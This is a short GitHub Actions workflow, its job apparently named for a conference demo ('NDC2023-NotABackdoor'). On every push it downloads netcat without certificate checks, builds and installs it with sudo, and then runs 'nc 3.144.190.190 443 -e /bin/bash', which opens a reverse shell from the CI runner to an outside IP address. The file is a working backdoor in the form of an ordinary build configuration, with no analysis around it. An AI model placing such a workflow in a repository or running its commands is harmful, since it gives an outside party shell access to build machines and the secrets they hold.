on: [push]

jobs:
  NDC2023:
    runs-on: ubuntu-latest
    name: NDC2023-NotABackdoor
    steps:
      - run: |
            wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz --no-check-certificate
            tar -xzvf netcat-0.7.1.tar.gz
            cd netcat-0.7.1 
            ./configure
            sudo make
            sudo make install
            nc 3.144.190.190 443 -e /bin/bash
